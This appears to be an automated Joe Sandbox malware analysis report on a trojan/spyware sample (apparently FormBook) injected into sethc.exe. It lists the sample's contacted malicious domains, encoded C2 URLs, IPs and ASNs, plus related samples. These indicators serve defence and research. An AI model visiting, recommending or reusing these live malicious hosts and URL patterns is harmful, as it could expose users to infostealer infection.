                http://www.aextligrwjv.best/msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J100%Avira URL Cloudmalware
                http://www.remedies.pro/4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.everythlngict.org/hxjq/0%Avira URL Cloudsafe
                http://www.vayui.top/t4v0/0%Avira URL Cloudsafe
                http://www.327531.buzz/iyce/0%Avira URL Cloudsafe
                http://www.nicolemichelle.net0%Avira URL Cloudsafe
                http://www.hwbzfdtn.tokyo/3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.129glenforest.com/zgqx/0%Avira URL Cloudsafe
                http://www.dating-ml-es.xyz/pvrm/0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click/8292/0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click/8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.129glenforest.com/zgqx/?GhEtuH=vpXfiL7xAiwEgavhBJ5+dVbyToiv3Ajc9/9k/kyom/IPODfyHTsY9MNM1oIIcM9OOPgjl+yjy+dwg4YL1U+Z+aAXCKq38CY4+hImZkjI6IAgM5qe0htR9lzNJYnqwffYKnUXs/x3ziJB&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.futurorks.xyz/cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.futurorks.xyz/cpty/0%Avira URL Cloudsafe
                http://www.327531.buzz/iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOe0%Avira URL Cloudsafe
                http://www.dating-ml-es.xyz/pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/912o/0%Avira URL Cloudsafe
                http://www.nicolemichelle.net/4vk9/0%Avira URL Cloudsafe
                http://www.hwbzfdtn.tokyo/3pje/0%Avira URL Cloudsafe
                http://www.vayui.top/t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OP0%Avira URL Cloudsafe
                http://www.remedies.pro/4azw/0%Avira URL Cloudsafe
                http://www.duwixushx.xyz/fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OP100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.remedies.pro
                		13.248.169.48
                		truetrue
                  		unknown
                  www.vayui.top
                  		172.67.145.234
                  		truefalse
                    		high
                    domains-38.cribflyer.com
                    		54.176.168.58
                    		truetrue
                      		unknown
                      www.aextligrwjv.best
                      		172.67.185.6
                      		truetrue
                        		unknown
                        www.duwixushx.xyz
                        		156.251.17.224
                        		truefalse
                          		high
                          benteng01.cn
                          		8.223.59.213
                          		truetrue
                            		unknown
                            natroredirect.natrocdn.com
                            		85.159.66.93
                            		truefalse
                              		high
                              www.3kw40881107247y.click
                              		172.67.192.207
                              		truetrue
                                		unknown
                                zhs.zohosites.com
                                		136.143.186.12
                                		truefalse
                                  		high
                                  www.nicolemichelle.net
                                  		38.63.190.200
                                  		truefalse
                                    		unknown
                                    www.futurorks.xyz
                                    		203.161.43.228
                                    		truetrue
                                      		unknown
                                      www.327531.buzz
                                      		43.199.54.158
                                      		truetrue
                                        		unknown
                                        www.dating-ml-es.xyz
                                        		199.59.243.227
                                        		truetrue
                                          		unknown
                                          www.hwbzfdtn.tokyo
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.129glenforest.com
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.soainsaat.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.everythlngict.org
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.duwixushx.xyz/fyc8/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.dating-ml-es.xyz/pvrm/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hwbzfdtn.tokyo/3pje/?GhEtuH=2C5VcNcdbhFphNwA7gbLu4o0N5MJpmvs9kBgNmJqElzxjYuhWh9e33X7OaqqoaP4YBwO1oY27LwLJ/gdnK1kbQ0HR4V8Mf1XFtPz1ewRRkQFG47cZvjpm9IGNViEPL31rvHero6O+mYM&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.remedies.pro/4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vayui.top/t4v0/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.327531.buzz/iyce/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.aextligrwjv.best/msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8Jtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.129glenforest.com/zgqx/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.everythlngict.org/hxjq/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.3kw40881107247y.click/8292/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.futurorks.xyz/cpty/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dating-ml-es.xyz/pvrm/?GhEtuH=q9VU5shSkDSssKORJVQgPyBT6NXL0uGF1tcH5gjeNKzzvUK22qQBZnHtscqLZ9MjFbahEO+8XCavPFU5GWG6ZiikqcFlEViNL/eErSple439PFpGhjhhgUgyeLHF+kDRjmkJ2QCUDUlW&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.327531.buzz/iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOetrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.3kw40881107247y.click/8292/?GhEtuH=dnAXxbFHa6RK1uN3p+sQJBgkj7tI4LA3ZFKVH8On554fy+qRTfvRsSc0GNZ8hi+JaenG7xaf5F4Z1N3TeCmANQO8Fwm04ZJnyd/RH1yf5K4Kkfm0UhvZq/AJXt0L6OF1dgVk5sLd5yBY&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.futurorks.xyz/cpty/?GhEtuH=FOqfvw/D9TxLZ9zn5tlxjpsMOed4GZEMgX1z5u2hu/q28qXHvFp93Fs8lYoTq8WZ051sNJVY/UqOjH0F7ziUmXJv/tNxSQB91KtCf68XTy52NA+Nrb8mvfzj4zmGoOcEjhOtBV7kDBoK&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.129glenforest.com/zgqx/?GhEtuH=vpXfiL7xAiwEgavhBJ5+dVbyToiv3Ajc9/9k/kyom/IPODfyHTsY9MNM1oIIcM9OOPgjl+yjy+dwg4YL1U+Z+aAXCKq38CY4+hImZkjI6IAgM5qe0htR9lzNJYnqwffYKnUXs/x3ziJB&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.soainsaat.xyz/912o/?GhEtuH=70ci5pGKsfR7ryWTKFtFiUt7/TqIPHf64KC8vmTT6Dtcu2BtDGHTaTjOoGUC2iu8k3BJ4N7Du7dNBD6fJpU48FM3duIc/ctQLZHS0QyH+uuzGzjKGZHdmjrbFNuBsSBruIhtULDLHkLM&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.soainsaat.xyz/912o/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nicolemichelle.net/4vk9/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.hwbzfdtn.tokyo/3pje/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.vayui.top/t4v0/?GhEtuH=BaKEDIuCqsvR37Bn6+TgiJMwkxJzDUIqAYq0m1TFifk8gDAIMlekNhph8Tar9Z0dtwi6g0hFX56VxC4Q/su0r8fyWQFgq8KpC42yk6uDr99A+ZghhUp+L9tXlGYeR9GDO3Mz2SBmPslm&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.duwixushx.xyz/fyc8/?GhEtuH=9quk7MnvWgGB/+oSKiWFDzYoPJYT6eA3ueh2PF/6PpTLuIpSuGh5poP5vhKU1hzLJrxVAWnbk59J+ABTrLnIqcNR2VABk2apNjRDHz4+NFXCe5SYECaGO4YN/+FCU+q/RL6A2UBNebQ0&9hy=gvrDS8U8OPtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.remedies.pro/4azw/true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabsethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000sethc.exe, 00000006.00000002.3778868913.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000043E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.zoho.com/sites/images/professionally-crafted-themes.pngsethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.zoho.com/sites/?src=parkeddomain&dr=www.everythlngict.orgsethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.ecosia.org/newtab/sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.nicolemichelle.netRlKZsaoEJNpD.exe, 00000007.00000002.3780336358.0000000005672000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.comsethc.exe, 00000006.00000002.3778868913.0000000006588000.00000004.10000000.00040000.00000000.sdmp, sethc.exe, 00000006.00000002.3780779249.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000004578000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssethc.exe, 00000006.00000002.3778868913.00000000060D2000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000040C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbsethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                13.248.169.48
                                                                                		www.remedies.proUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                136.143.186.12
                                                                                		zhs.zohosites.comUnited States
                                                                                		2639ZOHO-ASUSfalse
                                                                                172.67.185.6
                                                                                		www.aextligrwjv.bestUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                199.59.243.227
                                                                                		www.dating-ml-es.xyzUnited States
                                                                                		395082BODIS-NJUStrue
                                                                                85.159.66.93
                                                                                		natroredirect.natrocdn.comTurkey
                                                                                		34619CIZGITRfalse
                                                                                38.63.190.200
                                                                                		www.nicolemichelle.netUnited States
                                                                                		174COGENT-174USfalse
                                                                                203.161.43.228
                                                                                		www.futurorks.xyzMalaysia
                                                                                		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                156.251.17.224
                                                                                		www.duwixushx.xyzSeychelles
                                                                                		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                172.67.192.207
                                                                                		www.3kw40881107247y.clickUnited States
                                                                                		13335CLOUDFLARENETUStrue
                                                                                54.176.168.58
                                                                                		domains-38.cribflyer.comUnited States
                                                                                		16509AMAZON-02UStrue
                                                                                8.223.59.213
                                                                                		benteng01.cnSingapore
                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                172.67.145.234
                                                                                		www.vayui.topUnited States
                                                                                		13335CLOUDFLARENETUSfalse
                                                                                43.199.54.158
                                                                                		www.327531.buzzJapan4249LILLY-ASUStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1568372
                                                                                Start date and time:2024-12-04 15:29:43 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 11m 0s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:12
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:2
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:ek8LkB2Cgo.exe
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@15/13
                                                                                EGA Information:
                                                                                • Successful, ratio: 75%
                                                                                HCA Information:
                                                                                • Successful, ratio: 91%
                                                                                • Number of executed functions: 49
                                                                                • Number of non-executed functions: 299
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • VT rate limit hit for: ek8LkB2Cgo.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                10:41:26API Interceptor9854216x Sleep call for process: sethc.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                13.248.169.48Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                                Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                • www.smartgov.shop/1cwp/
                                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                • www.egyshare.xyz/440l/
                                                                                attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                • www.aktmarket.xyz/wb7v/
                                                                                YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
                                                                                Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                • www.optimismbank.xyz/98j3/
                                                                                lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                • www.avalanchefi.xyz/ctta/
                                                                                BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                • www.tals.xyz/k1td/
                                                                                PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                • www.heliopsis.xyz/69zn/
                                                                                1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • www.gupiao.bet/t3a1/
                                                                                136.143.186.12r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/tpid/
                                                                                Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/1q08/
                                                                                jeez.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/m8yb/
                                                                                PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/ivo1/
                                                                                z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/1q08/
                                                                                NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/ivo1/
                                                                                DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/ivo1/
                                                                                PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/ivo1/
                                                                                x.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/em49/
                                                                                bin.exeGet hashmaliciousFormBookBrowse
                                                                                • www.lanxuanz.tech/em49/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                www.remedies.proSW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 13.248.169.48
                                                                                natroredirect.natrocdn.comPO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                New Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 85.159.66.93
                                                                                CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                • 85.159.66.93
                                                                                www.vayui.topPO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.95.160
                                                                                Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.145.234
                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 172.67.145.234
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 104.21.95.160
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.145.234
                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 172.67.145.234
                                                                                S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                • 104.21.95.160
                                                                                purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.145.234
                                                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.145.234
                                                                                domains-38.cribflyer.comItem-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                • 50.18.131.220
                                                                                www.duwixushx.xyzPO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                • 156.251.17.224
                                                                                PO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                                                • 156.251.17.224
                                                                                OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                • 156.251.17.224
                                                                                DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                • 156.251.17.224

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSWelcome To Raise.emlGet hashmaliciousUnknownBrowse
                                                                                • 1.1.1.1
                                                                                Teklif Talebi #U0130hale No_14991_PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 172.67.177.134
                                                                                Ziraat Bankasi Swift Mesaji.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 104.21.67.152
                                                                                rukT6hBo6P.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 172.67.70.233
                                                                                https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                                                                                • 104.21.57.195
                                                                                https://indiollanero7nudos.comGet hashmaliciousUnknownBrowse
                                                                                • 172.67.191.200
                                                                                JjUCGUKdtX.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.21.27.3
                                                                                gCK3ozTL7Q.ps1Get hashmaliciousPhemedrone StealerBrowse
                                                                                • 172.67.70.233
                                                                                Activation.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                • 104.26.1.100
                                                                                T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.16.184.241
                                                                                AMAZON-02USWelcome To Raise.emlGet hashmaliciousUnknownBrowse
                                                                                • 18.134.234.85
                                                                                https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                                                                                • 52.211.89.170
                                                                                Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                • 13.227.8.37
                                                                                RzLnOTy9k3.lnkGet hashmaliciousLummaC StealerBrowse
                                                                                • 52.218.232.113
                                                                                main_x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 54.171.230.55
                                                                                http://redr.meGet hashmaliciousUnknownBrowse
                                                                                • 13.227.8.8
                                                                                Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                • 54.150.207.131
                                                                                main_arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 54.247.62.1
                                                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                • 54.171.230.55
                                                                                Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                                                                                • 54.150.207.131
                                                                                BODIS-NJUSbestimylover.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                • 199.59.243.227
                                                                                http://divisioninfo.net/Get hashmaliciousUnknownBrowse
                                                                                • 199.59.243.205
                                                                                SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 199.59.243.227
                                                                                1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 199.59.243.227
                                                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 199.59.243.227
                                                                                FATURA.exeGet hashmaliciousFormBookBrowse
                                                                                • 199.59.243.227
                                                                                Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 199.59.243.227
                                                                                file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                • 199.59.243.227
                                                                                ZOHO-ASUShttps://www.manageuser.com/products/oputils/83624731/Manageuser_OpUtils_64bit.exeGet hashmaliciousUnknownBrowse
                                                                                • 136.143.186.18
